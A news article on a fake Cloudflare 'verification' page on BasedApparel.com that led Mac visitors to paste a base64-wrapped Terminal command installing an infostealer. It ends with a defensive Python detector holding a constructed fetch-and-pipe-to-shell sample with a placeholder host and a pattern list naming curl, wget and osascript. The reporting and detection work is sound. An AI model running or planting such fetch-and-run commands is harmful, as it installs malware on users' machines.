Mac users tricked by fake Cloudflare
- On May 22, researchers and news outlets reported that BasedApparel.com served fake Cloudflare checks that tricked some Mac visitors into running malware.
- PCMag said the copied “verification” string hid a base64-encoded command; researcher “debbie” called the payload “a classic infostealer, wrapped twice in base64.”
- By May 22, TechCrunch reported Based Apparel was offline after disclosure; Microsoft and Malwarebytes have published related ClickFix research.
On May 22, reports from PCMag, Yahoo Tech and TechCrunch said visitors to BasedApparel.com, a political merchandise site linked to FBI Director Kash Patel, were intermittently shown a fake Cloudflare verification page that targeted Mac users. The page told users to prove they were human by opening Terminal and pasting a copied string, according to PCMag’s account of the attack. Researchers said the copied text was not a harmless verification code but an obfuscated command that fetched malware. By Friday, TechCrunch reported the site had been taken offline after the reports.

### How did the fake Cloudflare page work?

PCMag reported that the site displayed a page styled as a Cloudflare warning with the message “Unusual Web Traffic Detected” and instructions to verify the visitor was human. The page told users to click a “Copy” button and then paste the result into Terminal on macOS. The copied text, PCMag said, only appeared to be a short verification phrase.

In practice, the button copied a longer hidden command. Yahoo Tech said the command was base64-encoded and, once pasted into Terminal, downloaded an AppleScript-based infostealer aimed at browser passwords and cryptocurrency wallets.

### Why would a user run a command from a website?

Cloudflare is a widely used web security service, and the fake page borrowed that trust. PCMag said the attack used a “ClickFix”-style method, in which a site presents a problem and then gives the victim a supposed fix that is actually malicious.

Malwarebytes said this technique does not rely on a browser exploit or a poisoned app download. Its March 26 research on Infiniti Stealer said fake CAPTCHA or verification pages instead persuade users to open Terminal, paste a command and press Return, starting the infection by the user’s own action.

### Why does Terminal matter so much in these attacks?

Microsoft said on May 6 that recent ClickFix campaigns targeting macOS use Terminal commands to retrieve remotely hosted content and launch script-based loaders. Microsoft said that differs from the usual app-install flow because scripts run directly through Terminal do not go through the same Gatekeeper checks that can apply to application bundles opened in Finder.

That distinction helps explain why the lure is effective. A user is not being asked to install a visible app from a disk image. The user is being told to run what looks like a verification step, while the command pulls down the next stage from attacker-controlled infrastructure, according to Microsoft and PCMag.

### What malware was involved here?

Researcher “debbie,” quoted by PCMag and Yahoo Tech, described the payload as “a classic infostealer, wrapped twice in base64.” PCMag said she recovered the shell script and that VirusTotal detections flagged it as malicious, including Trojan and infostealer classifications. Yahoo Tech said 27 antivirus engines flagged the payload.

Malwarebytes and Microsoft have both documented a broader rise in macOS ClickFix campaigns in 2026. Malwarebytes said Infiniti Stealer uses fake verification pages to get users to run commands themselves, while Microsoft said related campaigns have delivered Macsync, Shub Stealer and AMOS. Both firms said the malware can steal credentials, wallet data and other sensitive files.

### Was the site itself the attacker?

TechCrunch reported that Based Apparel’s website was taken offline on Friday after reports that it had been hijacked by hackers trying to infect visitors with malware. Yahoo Tech also said the site appeared compromised rather than intentionally malicious, describing that as a common pattern in ClickFix incidents where attackers abuse legitimate websites.

PCMag said the site is part of a merchandise brand Patel co-created with Andrew Ollis before Patel became FBI director. TechCrunch said Based Apparel could not be reached for comment and that an email sent to a Gmail address previously associated with Patel did not receive a response.

### What should Mac users watch for next?

Apple’s current macOS releases include warnings when users paste potentially dangerous commands into Terminal, Yahoo Tech reported. But Microsoft’s May 6 research and Malwarebytes’ March 26 report both indicate that ClickFix-style social engineering against Mac users is still spreading across compromised or attacker-controlled sites.

As of May 22, the immediate next step in this case was the site outage. The broader next step is likely to come from vendor advisories and threat-research updates from Microsoft, Malwarebytes and other security firms tracking ClickFix activity on macOS.
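The reports above describe two things a defender can check for mechanically: a pasted "verification" string that is really a base64 blob, wrapped more than once, and an innermost command that fetches remote content and pipes it into a shell or into osascript. The Python below is an added example, not code from PCMag, Yahoo Tech, TechCrunch, Microsoft or Malwarebytes, and it is not the actual BasedApparel.com payload. It builds its own constructed sample (placeholder host example.invalid, double-wrapped the way the researcher described), peels the base64 layers off, and scores the result with a small, constructed indicator list of the kind a clipboard-paste warning or a shell-history review might apply.

```python
import base64
import binascii
import re

# A run of base64 alphabet characters long enough to be worth decoding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")

# Constructed indicator list (not a vendor rule set): what the articles say the
# innermost command does. macOS base64 decodes with -D, GNU coreutils with -d.
INDICATORS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(sh|bash|zsh)\b"),
    "base64_decode": re.compile(r"base64\s+(-d|--decode|-D)\b"),
    "applescript": re.compile(r"\bosascript\b"),
    "eval_exec": re.compile(r"\b(eval|exec)\b"),
}


def _try_decode(token: str):
    """Return the token decoded as base64 text, or None if it is not text."""
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if not all(ch.isprintable() or ch in "\t\n\r" for ch in text):
        return None
    return text


def unwrap_base64_layers(command: str, max_layers: int = 5) -> list:
    """Peel nested base64 off a command; returns the layers, outermost first.

    Each pass replaces every decodable blob in the current layer with its
    decoded text, so a command "wrapped twice" yields three layers.
    """
    layers = [command]
    for _ in range(max_layers):
        current = layers[-1]
        expanded = current
        for token in set(B64_TOKEN.findall(current)):
            text = _try_decode(token)
            if text is not None:
                expanded = expanded.replace(token, text)
        if expanded == current:
            break  # nothing left to decode
        layers.append(expanded)
    return layers


def assess_pasted_command(command: str) -> dict:
    """Score a command the way a paste warning or history review might."""
    layers = unwrap_base64_layers(command)
    everything = "\n".join(layers)
    decoded_only = "\n".join(layers[1:])
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(everything))
    # Fetch-and-pipe-to-shell anywhere, or AppleScript hidden under base64,
    # is the pattern the reports describe; a lone base64 decode is not enough.
    suspicious = ("remote_fetch" in hits and "pipe_to_shell" in hits) or bool(
        INDICATORS["applescript"].search(decoded_only)
    )
    return {
        "base64_layers": len(layers) - 1,
        "indicators": hits,
        "innermost": layers[-1],
        "suspicious": suspicious,
    }


def build_constructed_sample() -> str:
    """Constructed stand-in for the copied 'verification' string (not the real one)."""
    inner = "curl -fsSL http://example.invalid/stage2.sh | sh"  # placeholder host
    once = base64.b64encode(inner.encode()).decode()
    twice = base64.b64encode(f"echo {once} | base64 -D | sh".encode()).decode()
    return f"echo {twice} | base64 -D | sh"


def build_benign_sample() -> str:
    """Constructed benign use of base64 that should not be flagged."""
    blob = base64.b64encode(b"export EDITOR=vim").decode()
    return f"echo {blob} | base64 -D"


if __name__ == "__main__":
    for cmd in (build_constructed_sample(), build_benign_sample(), "ls -la ~/Documents"):
        result = assess_pasted_command(cmd)
        print(f"{'SUSPICIOUS' if result['suspicious'] else 'ok        '} "
              f"layers={result['base64_layers']} indicators={result['indicators']}")
```

The check deliberately keys on the combination the reports describe (remote fetch plus pipe to a shell, or osascript under a base64 wrapper) rather than on base64 alone, so ordinary decode-to-stdout usage is not flagged; a real deployment would also want the decoded layers logged for later review.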